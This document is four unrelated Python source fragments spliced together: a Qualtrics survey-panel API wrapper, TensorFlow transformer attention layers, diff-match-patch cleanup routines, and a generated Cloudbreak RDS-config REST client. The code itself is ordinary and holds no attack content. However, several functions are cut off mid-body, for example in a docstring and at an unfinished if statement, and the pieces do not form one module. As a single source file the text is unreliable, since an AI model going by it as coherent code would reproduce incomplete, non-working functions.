self.last_error_message = "Unexpected response from Qualtrics: no Status key in JSON response"
return None
if json_response["Meta"]["Status"] == "Success":
self.last_error_message = None
return json_response
# If error happens, it returns JSON object too
# Error message is in json_response["Meta"]["ErrorMessage"]
self.last_error_message = json_response["Meta"]["ErrorMessage"]
return None
def createPanel(self, LibraryID, Name, **kwargs):
""" Creates a new Panel in the Qualtrics System and returns the id of the new panel
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#createPanel_2.5
:param LibraryID: The library id you want to create the panel in
:param Name: The name of the new panel
:return: PanelID of new panel, None if error occurs
"""
if self.request("createPanel", LibraryID=LibraryID, Name=Name, **kwargs) is None:
return None
return self.json_response["Result"]["PanelID"]
def deletePanel(self, LibraryID, PanelID, **kwargs):
""" Deletes the panel.
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#deletePanel_2.5
:param LibraryID: The library id the panel is in.
:param PanelID: The panel id that will be deleted.
:return: True if deletion was successful, False otherwise
"""
if self.request("deletePanel", LibraryID=LibraryID, PanelID=PanelID, **kwargs) is None:
return False
return True
def getPanelMemberCount(self, LibraryID, PanelID, **kwargs):
""" Gets the number of panel members
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#getPanelMemberCount_2.5
:param LibraryID: The library ID where this panel belongs
:param PanelID: The panel ID
:param kwargs: Additional parameters (used by unittest)
:return: The Number of members
"""
if self.request("getPanelMemberCount", LibraryID=LibraryID, PanelID=PanelID, **kwargs) is None:
return None
return int(self.json_response["Result"]["Count"])
def addRecipient(self, LibraryID, PanelID, FirstName, LastName, Email, ExternalDataRef, Language, ED):
""" Add a new recipient to a panel
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#addRecipient_2.5
:param LibraryID: The library the recipient belongs to
:param PanelID: The panel to add the recipient
:param FirstName: The first name
:param LastName: The last name
:param Email: The email address
:param ExternalDataRef: The external data reference
:param Language: The language code
:param ED: The embedded data (dictionary)
:return: The Recipient ID or None
"""
if not self.request("addRecipient",
LibraryID=LibraryID,
PanelID=PanelID,
FirstName=FirstName,
LastName=LastName,
Email=Email,
ExternalDataRef=ExternalDataRef,
Language=Language,
ED=ED):
return None
return self.json_response["Result"]["RecipientID"]
def getRecipient(self, LibraryID, RecipientID):
"""Get a representation of the recipient and their history
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#getRecipient_2.5
:param LibraryID: The library the recipient belongs to
:param RecipientID: The recipient id of the person's response history you want to retrieve
"""
if not self.request("getRecipient", LibraryID=LibraryID, RecipientID=RecipientID):
return None
return self.json_response["Result"]["Recipient"]
def removeRecipient(self, LibraryID, PanelID, RecipientID, **kwargs):
""" Removes the specified panel member recipient from the specified panel.
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#removeRecipient_2.5
:param LibraryID: The library the recipient belongs to
:param PanelID: The panel to remove the recipient from
:param RecipientID: The recipient id of the person that will be updated
:return: True if successful, False otherwise
"""
if not self.request("removeRecipient", LibraryID=LibraryID, PanelID=PanelID, RecipientID=RecipientID, **kwargs):
return False
return True
def sendSurveyToIndividual(self, **kwargs):
""" Sends a survey through the Qualtrics mailer to the individual specified.
Note that request will be put to queue and emails are not sent immediately (although they usually
delivered in a few seconds after this function is complete)
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#sendSurveyToIndividual_2.5
Example response (success):
{u'Meta': {u'Status': u'Success', u'Debug': u''},
u'Result': {u'DistributionQueueID': u'EMD_e3F0KAIVfzIYw0R', u'EmailDistributionID': u'EMD_e3F0KAIVfzIYw0R', u'Success': True}}
:param kwargs:
:return: EmailDistributionID
"""
if not self.request("sendSurveyToIndividual", **kwargs):
return None
return self.json_response["Result"]["EmailDistributionID"]
def sendSurveyToPanel(self, SurveyID, SendDate, SentFromAddress, FromEmail, FromName, Subject, MessageID, MessageLibraryID, PanelID, PanelLibraryID, LinkType, **kwargs):
""" Sends a survey through the Qualtrics mailer to the panel specified.
Note that request will be put to queue and emails are not sent immediately (although they usually
delivered in a few seconds after this function is complete)
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#sendSurveyToPanel_2.5
Example response (success):
{"Meta":{"Status":"Success","Debug":""},
"Result":{"Success":true,"EmailDistributionID":"EMD_0DQNoLbdDMeGvK5", "DistributionQueueID":"EMD_0DQNoLbdDMeGvK5"}}
:param LinkType: The type of link that will be sent out.
Individual (default) - one unique link for each recipient will be generated that can be taken one | |
shape [batch, seq_length, hidden_size].
num_attention_heads: Number of attention heads.
head_size: The size per attention head.
initializer: Kernel initializer.
activation: Actication function.
name: The name scope of this layer.
Returns:
float logits Tensor.
"""
input_shape = get_shape_list(input_tensor)
hidden_size = input_shape[2]
with tf.variable_scope(name):
w = tf.get_variable(
name="kernel",
shape=[hidden_size, num_attention_heads * head_size],
initializer=initializer)
w = tf.reshape(w, [hidden_size, num_attention_heads, head_size])
b = tf.get_variable(
name="bias",
shape=[num_attention_heads * head_size],
initializer=tf.zeros_initializer)
b = tf.reshape(b, [num_attention_heads, head_size])
ret = tf.einsum("BFH,HND->BFND", input_tensor, w)
ret += b
if activation is not None:
return activation(ret)
else:
return ret
def dense_layer_3d_proj(input_tensor,
hidden_size,
head_size,
initializer,
activation,
name=None):
"""A dense layer with 3D kernel for projection.
Args:
input_tensor: float Tensor of shape [batch,from_seq_length,
num_attention_heads, size_per_head].
hidden_size: The size of hidden layer.
num_attention_heads: The size of output dimension.
head_size: The size of head.
initializer: Kernel initializer.
activation: Actication function.
name: The name scope of this layer.
Returns:
float logits Tensor.
"""
input_shape = get_shape_list(input_tensor)
num_attention_heads = input_shape[2]
with tf.variable_scope(name):
w = tf.get_variable(
name="kernel",
shape=[num_attention_heads * head_size, hidden_size],
initializer=initializer)
w = tf.reshape(w, [num_attention_heads, head_size, hidden_size])
b = tf.get_variable(
name="bias", shape=[hidden_size], initializer=tf.zeros_initializer)
ret = tf.einsum("BFND,NDH->BFH", input_tensor, w)
ret += b
if activation is not None:
return activation(ret)
else:
return ret
def dense_layer_2d(input_tensor,
output_size,
initializer,
activation,
num_attention_heads=1,
name=None):
"""A dense layer with 2D kernel.
Args:
input_tensor: Float tensor with rank 3.
output_size: The size of output dimension.
initializer: Kernel initializer.
activation: Activation function.
num_attention_heads: number of attention head in attention layer.
name: The name scope of this layer.
Returns:
float logits Tensor.
"""
del num_attention_heads # unused
input_shape = get_shape_list(input_tensor)
hidden_size = input_shape[2]
with tf.variable_scope(name):
w = tf.get_variable(
name="kernel",
shape=[hidden_size, output_size],
initializer=initializer)
b = tf.get_variable(
name="bias", shape=[output_size], initializer=tf.zeros_initializer)
ret = tf.einsum("BFH,HO->BFO", input_tensor, w)
ret += b
if activation is not None:
return activation(ret)
else:
return ret
def dot_product_attention(q, k, v, bias, dropout_rate=0.0):
"""Dot-product attention.
Args:
q: Tensor with shape [..., length_q, depth_k].
k: Tensor with shape [..., length_kv, depth_k]. Leading dimensions must
match with q.
v: Tensor with shape [..., length_kv, depth_v] Leading dimensions must
match with q.
bias: bias Tensor (see attention_bias())
dropout_rate: a float.
Returns:
Tensor with shape [..., length_q, depth_v].
"""
logits = tf.matmul(q, k, transpose_b=True) # [..., length_q, length_kv]
logits = tf.multiply(logits, 1.0 / math.sqrt(float(get_shape_list(q)[-1])))
if bias is not None:
# `attention_mask` = [B, T]
from_shape = get_shape_list(q)
if len(from_shape) == 4:
broadcast_ones = tf.ones([from_shape[0], 1, from_shape[2], 1], tf.float32)
elif len(from_shape) == 5:
# from_shape = [B, N, Block_num, block_size, depth]#
broadcast_ones = tf.ones([from_shape[0], 1, from_shape[2], from_shape[3],
1], tf.float32)
bias = tf.matmul(broadcast_ones,
tf.cast(bias, tf.float32), transpose_b=True)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
adder = (1.0 - bias) * -10000.0
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
logits += adder
else:
adder = 0.0
attention_probs = tf.nn.softmax(logits, name="attention_probs")
attention_probs = dropout(attention_probs, dropout_rate)
return tf.matmul(attention_probs, v)
def attention_layer(from_tensor,
to_tensor,
attention_mask=None,
num_attention_heads=1,
query_act=None,
key_act=None,
value_act=None,
attention_probs_dropout_prob=0.0,
initializer_range=0.02,
batch_size=None,
from_seq_length=None,
to_seq_length=None):
"""Performs multi-headed attention from `from_tensor` to `to_tensor`.
Args:
from_tensor: float Tensor of shape [batch_size, from_seq_length,
from_width].
to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width].
attention_mask: (optional) int32 Tensor of shape [batch_size,
from_seq_length, to_seq_length]. The values should be 1 or 0. The
attention scores will effectively be set to -infinity for any positions in
the mask that are 0, and will be unchanged for positions that are 1.
num_attention_heads: int. Number of attention heads.
query_act: (optional) Activation function for the query transform.
key_act: (optional) Activation function for the key transform.
value_act: (optional) Activation function for the value transform.
attention_probs_dropout_prob: (optional) float. Dropout probability of the
attention probabilities.
initializer_range: float. Range of the weight initializer.
batch_size: (Optional) int. If the input is 2D, this might be the batch size
of the 3D version of the `from_tensor` and `to_tensor`.
from_seq_length: (Optional) If the input is 2D, this might be the seq length
of the 3D version of the `from_tensor`.
to_seq_length: (Optional) If the input is 2D, this might be the seq length
of the 3D version of the `to_tensor`.
Returns:
float Tensor of shape [batch_size, from_seq_length, num_attention_heads,
size_per_head].
Raises:
ValueError: Any of the arguments or tensor shapes are invalid.
"""
from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
to_shape = get_shape_list(to_tensor, expected_rank=[2, 3])
size_per_head = int(from_shape[2] / num_attention_heads)
if len(from_shape) != len(to_shape):
raise ValueError(
"The rank of `from_tensor` must match the rank of `to_tensor`.")
if len(from_shape) == 3:
batch_size = from_shape[0]
from_seq_length = from_shape[1]
to_seq_length = to_shape[1]
elif len(from_shape) == 2:
if (batch_size is None or from_seq_length is None or to_seq_length is None):
raise ValueError(
"When passing in rank 2 tensors to attention_layer, the values "
"for `batch_size`, `from_seq_length`, and `to_seq_length` "
"must all be specified.")
# Scalar dimensions referenced here:
# B = batch size (number of sequences)
# F = `from_tensor` sequence length
# T = `to_tensor` sequence length
# N = `num_attention_heads`
# H = `size_per_head`
# `query_layer` = [B, F, N, H]
q = dense_layer_3d(from_tensor, num_attention_heads, size_per_head,
create_initializer(initializer_range), query_act, "query")
# `key_layer` = [B, T, N, H]
k = dense_layer_3d(to_tensor, num_attention_heads, size_per_head,
create_initializer(initializer_range), key_act, "key")
# `value_layer` = [B, T, N, H]
v = dense_layer_3d(to_tensor, num_attention_heads, size_per_head,
create_initializer(initializer_range), value_act, "value")
q = tf.transpose(q, [0, 2, 1, 3])
k = tf.transpose(k, [0, 2, 1, 3])
v = tf.transpose(v, [0, 2, 1, 3])
if attention_mask is not None:
attention_mask = tf.reshape(
attention_mask, [batch_size, 1, to_seq_length, 1])
# 'new_embeddings = [B, N, F, H]'
new_embeddings = dot_product_attention(q, k, v, attention_mask,
attention_probs_dropout_prob)
return tf.transpose(new_embeddings, [0, 2, 1, 3])
def attention_ffn_block(layer_input,
hidden_size=768,
attention_mask=None,
num_attention_heads=1,
attention_head_size=64,
attention_probs_dropout_prob=0.0,
intermediate_size=3072,
intermediate_act_fn=None,
initializer_range=0.02,
hidden_dropout_prob=0.0):
"""A network with attention-ffn as sub-block.
Args:
layer_input: float Tensor of shape [batch_size, from_seq_length,
from_width].
hidden_size: (optional) int, size of hidden layer.
attention_mask: (optional) int32 Tensor of shape [batch_size,
from_seq_length, to_seq_length]. The values should be 1 or 0. The
attention scores will effectively be set to -infinity for any positions in
the mask that are 0, and will be unchanged for positions that are 1.
num_attention_heads: int. Number of attention heads.
attention_head_size: int. Size of attention head.
attention_probs_dropout_prob: float. dropout probability for attention_layer
intermediate_size: int. Size of intermediate hidden layer.
intermediate_act_fn: (optional) Activation function for the intermediate
layer.
initializer_range: float. Range of the weight initializer.
hidden_dropout_prob: (optional) float. Dropout probability of the hidden
layer.
Returns:
layer output
"""
with tf.variable_scope("attention_1"):
with tf.variable_scope("self"):
attention_output = attention_layer(
from_tensor=layer_input,
to_tensor=layer_input,
attention_mask=attention_mask,
num_attention_heads=num_attention_heads,
attention_probs_dropout_prob=attention_probs_dropout_prob,
initializer_range=initializer_range)
# Run a linear projection of `hidden_size` then add a residual
# with `layer_input`.
with tf.variable_scope("output"):
attention_output = dense_layer_3d_proj(
attention_output,
hidden_size,
attention_head_size,
create_initializer(initializer_range),
None,
name="dense")
attention_output = dropout(attention_output, hidden_dropout_prob)
attention_output = layer_norm(attention_output + layer_input)
with tf.variable_scope("ffn_1"):
with tf.variable_scope("intermediate"):
intermediate_output = dense_layer_2d(
attention_output,
intermediate_size,
create_initializer(initializer_range),
intermediate_act_fn,
num_attention_heads=num_attention_heads,
name="dense")
with tf.variable_scope("output"):
ffn_output = dense_layer_2d(
intermediate_output,
hidden_size,
create_initializer(initializer_range),
None,
num_attention_heads=num_attention_heads,
name="dense")
ffn_output = dropout(ffn_output, hidden_dropout_prob)
ffn_output = layer_norm(ffn_output + attention_output)
return ffn_output
def transformer_model(input_tensor,
attention_mask=None,
hidden_size=768,
num_hidden_layers=12,
num_hidden_groups=12,
num_attention_heads=12,
intermediate_size=3072,
inner_group_num=1,
intermediate_act_fn="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
initializer_range=0.02,
do_return_all_layers=False):
"""Multi-headed, multi-layer Transformer from "Attention is All You Need".
This is almost an exact implementation of the original Transformer encoder.
See the original paper:
https://arxiv.org/abs/1706.03762
Also see:
https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py
Args:
input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size].
attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length,
seq_length], with 1 for positions that can be attended to and 0 in
positions that should not be.
hidden_size: int. Hidden size of the Transformer.
num_hidden_layers: int. Number of layers (blocks) in the Transformer.
num_hidden_groups: int. Number of group for the hidden layers, parameters
in the same group are shared.
num_attention_heads: int. Number of attention heads in the Transformer.
intermediate_size: int. The size of the "intermediate" (a.k.a., feed
forward) layer.
inner_group_num: int, number of inner repetition of attention and ffn.
intermediate_act_fn: function. The non-linear activation function to apply
to the output of the intermediate/feed-forward | |
after the last equality.
while pointer < len(diffs):
if diffs[pointer][0] == self.DIFF_EQUAL: # Equality found.
if (len(diffs[pointer][1]) < self.Diff_EditCost and
(post_ins or post_del)):
# Candidate found.
equalities.append(pointer)
pre_ins = post_ins
pre_del = post_del
lastequality = diffs[pointer][1]
else:
# Not a candidate, and can never become one.
equalities = []
lastequality = None
post_ins = post_del = False
else: # An insertion or deletion.
if diffs[pointer][0] == self.DIFF_DELETE:
post_del = True
else:
post_ins = True
# Five types to be split:
# <ins>A</ins><del>B</del>XY<ins>C</ins><del>D</del>
# <ins>A</ins>X<ins>C</ins><del>D</del>
# <ins>A</ins><del>B</del>X<ins>C</ins>
# <ins>A</del>X<ins>C</ins><del>D</del>
# <ins>A</ins><del>B</del>X<del>C</del>
if lastequality and ((pre_ins and pre_del and post_ins and post_del) or
((len(lastequality) < self.Diff_EditCost / 2) and
(pre_ins + pre_del + post_ins + post_del) == 3)):
# Duplicate record.
diffs.insert(equalities[-1], (self.DIFF_DELETE, lastequality))
# Change second copy to insert.
diffs[equalities[-1] + 1] = (self.DIFF_INSERT,
diffs[equalities[-1] + 1][1])
equalities.pop() # Throw away the equality we just deleted.
lastequality = None
if pre_ins and pre_del:
# No changes made which could affect previous entry, keep going.
post_ins = post_del = True
equalities = []
else:
if len(equalities):
equalities.pop() # Throw away the previous equality.
if len(equalities):
pointer = equalities[-1]
else:
pointer = -1
post_ins = post_del = False
changes = True
pointer += 1
if changes:
self.diff_cleanupMerge(diffs)
def diff_cleanupMerge(self, diffs):
"""Reorder and merge like edit sections. Merge equalities.
Any edit section can move as long as it doesn't cross an equality.
Args:
diffs: Array of diff tuples.
"""
diffs.append((self.DIFF_EQUAL, '')) # Add a dummy entry at the end.
pointer = 0
count_delete = 0
count_insert = 0
text_delete = ''
text_insert = ''
while pointer < len(diffs):
if diffs[pointer][0] == self.DIFF_INSERT:
count_insert += 1
text_insert += diffs[pointer][1]
pointer += 1
elif diffs[pointer][0] == self.DIFF_DELETE:
count_delete += 1
text_delete += diffs[pointer][1]
pointer += 1
elif diffs[pointer][0] == self.DIFF_EQUAL:
# Upon reaching an equality, check for prior redundancies.
if count_delete + count_insert > 1:
if count_delete != 0 and count_insert != 0:
# Factor out any common prefixies.
commonlength = self.diff_commonPrefix(text_insert, text_delete)
if commonlength != 0:
x = pointer - count_delete - count_insert - 1
if x >= 0 and diffs[x][0] == self.DIFF_EQUAL:
diffs[x] = (diffs[x][0], diffs[x][1] +
text_insert[:commonlength])
else:
diffs.insert(0, (self.DIFF_EQUAL, text_insert[:commonlength]))
pointer += 1
text_insert = text_insert[commonlength:]
text_delete = text_delete[commonlength:]
# Factor out any common suffixies.
commonlength = self.diff_commonSuffix(text_insert, text_delete)
if commonlength != 0:
diffs[pointer] = (diffs[pointer][0], text_insert[-commonlength:] +
diffs[pointer][1])
text_insert = text_insert[:-commonlength]
text_delete = text_delete[:-commonlength]
# Delete the offending records and add the merged ones.
if count_delete == 0:
diffs[pointer - count_insert : pointer] = [
(self.DIFF_INSERT, text_insert)]
elif count_insert == 0:
diffs[pointer - count_delete : pointer] = [
(self.DIFF_DELETE, text_delete)]
else:
diffs[pointer - count_delete - count_insert : pointer] = [
(self.DIFF_DELETE, text_delete),
(self.DIFF_INSERT, text_insert)]
pointer = pointer - count_delete - count_insert + 1
if count_delete != 0:
pointer += 1
if count_insert != 0:
pointer += 1
elif pointer != 0 and diffs[pointer - 1][0] == self.DIFF_EQUAL:
# Merge this equality with the previous one.
diffs[pointer - 1] = (diffs[pointer - 1][0],
diffs[pointer - 1][1] + diffs[pointer][1])
del diffs[pointer]
else:
pointer += 1
count_insert = 0
count_delete = 0
text_delete = ''
text_insert = ''
if diffs[-1][1] == '':
diffs.pop() # Remove the dummy entry at the end.
# Second pass: look for single edits surrounded on both sides by equalities
# which can be shifted sideways to eliminate an equality.
# e.g: A<ins>BA</ins>C -> <ins>AB</ins>AC
changes = False
pointer = 1
# Intentionally ignore the first and last element (don't need checking).
while pointer < len(diffs) - 1:
if (diffs[pointer - 1][0] == self.DIFF_EQUAL and
diffs[pointer + 1][0] == self.DIFF_EQUAL):
# This is a single edit surrounded by equalities.
if diffs[pointer][1].endswith(diffs[pointer - 1][1]):
# Shift the edit over the previous equality.
diffs[pointer] = (diffs[pointer][0],
diffs[pointer - 1][1] +
diffs[pointer][1][:-len(diffs[pointer - 1][1])])
diffs[pointer + 1] = (diffs[pointer + 1][0],
diffs[pointer - 1][1] + diffs[pointer + 1][1])
del diffs[pointer - 1]
changes = True
elif diffs[pointer][1].startswith(diffs[pointer + 1][1]):
# Shift the edit over the next equality.
diffs[pointer - 1] = (diffs[pointer - 1][0],
diffs[pointer - 1][1] + diffs[pointer + 1][1])
diffs[pointer] = (diffs[pointer][0],
diffs[pointer][1][len(diffs[pointer + 1][1]):] +
diffs[pointer + 1][1])
del diffs[pointer + 1]
changes = True
pointer += 1
# If shifts were made, the diff needs reordering and another shift sweep.
if changes:
self.diff_cleanupMerge(diffs)
def diff_xIndex(self, diffs, loc):
"""loc is a location in text1, compute and return the equivalent location
in text2. e.g. "The cat" vs "The big cat", 1->1, 5->8
Args:
diffs: Array of diff tuples.
loc: Location within text1.
Returns:
Location within text2.
"""
chars1 = 0
chars2 = 0
last_chars1 = 0
last_chars2 = 0
for x in xrange(len(diffs)):
(op, text) = diffs[x]
if op != self.DIFF_INSERT: # Equality or deletion.
chars1 += len(text)
if op != self.DIFF_DELETE: # Equality or insertion.
chars2 += len(text)
if chars1 > loc: # Overshot the location.
break
last_chars1 = chars1
last_chars2 = chars2
if len(diffs) != x and diffs[x][0] == self.DIFF_DELETE:
# The location was deleted.
return last_chars2
# Add the remaining len(character).
return last_chars2 + (loc - last_chars1)
def diff_prettyHtml(self, diffs):
"""Convert a diff array into a pretty HTML report.
Args:
diffs: Array of diff tuples.
Returns:
HTML representation.
"""
html = []
for (op, data) in diffs:
text = (data.replace("&", "&").replace("<", "<")
.replace(">", ">").replace("\n", "¶<br>"))
if op == self.DIFF_INSERT:
html.append("<ins style=\"background:#e6ffe6;\">%s</ins>" % text)
elif op == self.DIFF_DELETE:
html.append("<del style=\"background:#ffe6e6;\">%s</del>" % text)
elif op == self.DIFF_EQUAL:
html.append("<span>%s</span>" % text)
return "".join(html)
def diff_text1(self, diffs):
"""Compute and return the source text (all equalities and deletions).
Args:
diffs: Array of diff tuples.
Returns:
Source text.
"""
text = []
for (op, data) in diffs:
if op != self.DIFF_INSERT:
text.append(data)
return "".join(text)
def diff_text2(self, diffs):
"""Compute and return the destination text (all equalities and insertions).
Args:
diffs: Array of diff tuples.
Returns:
Destination text.
"""
text = []
for (op, data) in diffs:
if op != self.DIFF_DELETE:
text.append(data)
return "".join(text)
def diff_levenshtein(self, diffs):
"""Compute the Levenshtein distance; the number of inserted, deleted or
substituted characters.
Args:
diffs: Array of diff tuples.
Returns:
Number of changes.
"""
levenshtein = 0
insertions = 0
deletions = 0
for (op, data) in diffs:
if op == self.DIFF_INSERT:
insertions += len(data)
elif op == self.DIFF_DELETE:
deletions += len(data)
elif op == self.DIFF_EQUAL:
# A deletion and an insertion is one substitution.
levenshtein += max(insertions, deletions)
insertions = 0
deletions = 0
levenshtein += max(insertions, deletions)
return levenshtein
def diff_toDelta(self, diffs):
"""Crush the diff into an encoded string which describes the operations
required to transform text1 into text2.
E.g. =3\t-2\t+ing -> Keep 3 chars, delete 2 chars, insert 'ing'.
Operations are tab-separated. Inserted text is escaped using %xx notation.
Args:
diffs: Array of diff tuples.
Returns:
Delta text.
"""
text = []
for (op, data) in diffs:
if op == self.DIFF_INSERT:
# High ascii will raise UnicodeDecodeError. Use Unicode instead.
data = data.encode("utf-8")
text.append("+" + urllib.quote(data, "!~*'();/?:@&=+$,# "))
elif op == self.DIFF_DELETE:
text.append("-%d" % len(data))
elif op == self.DIFF_EQUAL:
text.append("=%d" % len(data))
return "\t".join(text)
def diff_fromDelta(self, text1, delta):
"""Given the original text1, and an encoded string which describes the
operations required to transform text1 into text2, compute the full diff.
Args:
text1: Source string for the diff.
delta: Delta text.
Returns:
Array of diff tuples.
Raises:
ValueError: If invalid input.
"""
if type(delta) == unicode:
# Deltas should be composed of a subset of ascii chars, Unicode not
# required. If this encode raises UnicodeEncodeError, delta is invalid.
delta = delta.encode("ascii")
diffs = []
pointer = 0 # Cursor in text1
tokens = delta.split("\t")
for token in tokens:
if token == "":
# Blank tokens are ok (from a trailing \t).
continue
# Each token begins with a one character parameter which specifies the
# operation of this token (delete, insert, equality).
param = token[1:]
if token[0] | |
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class V3workspaceIdrdsconfigsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_rds_config_in_workspace(self, workspace_id, **kwargs):
"""
create RDS config in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_rds_config_in_workspace(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param RdsConfig body:
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_rds_config_in_workspace_with_http_info(workspace_id, **kwargs)
else:
(data) = self.create_rds_config_in_workspace_with_http_info(workspace_id, **kwargs)
return data
def create_rds_config_in_workspace_with_http_info(self, workspace_id, **kwargs):
"""
create RDS config in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_rds_config_in_workspace_with_http_info(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param RdsConfig body:
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_rds_config_in_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `create_rds_config_in_workspace`")
collection_formats = {}
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v3/{workspaceId}/rdsconfigs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RDSConfigResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_rds_config_in_workspace(self, workspace_id, name, **kwargs):
"""
delete RDS config by name in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_rds_config_in_workspace(workspace_id, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param str name: (required)
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_rds_config_in_workspace_with_http_info(workspace_id, name, **kwargs)
else:
(data) = self.delete_rds_config_in_workspace_with_http_info(workspace_id, name, **kwargs)
return data
def delete_rds_config_in_workspace_with_http_info(self, workspace_id, name, **kwargs):
"""
delete RDS config by name in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_rds_config_in_workspace_with_http_info(workspace_id, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param str name: (required)
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_rds_config_in_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `delete_rds_config_in_workspace`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_rds_config_in_workspace`")
collection_formats = {}
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'name' in params:
path_params['name'] = params['name']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v3/{workspaceId}/rdsconfigs/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RDSConfigResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
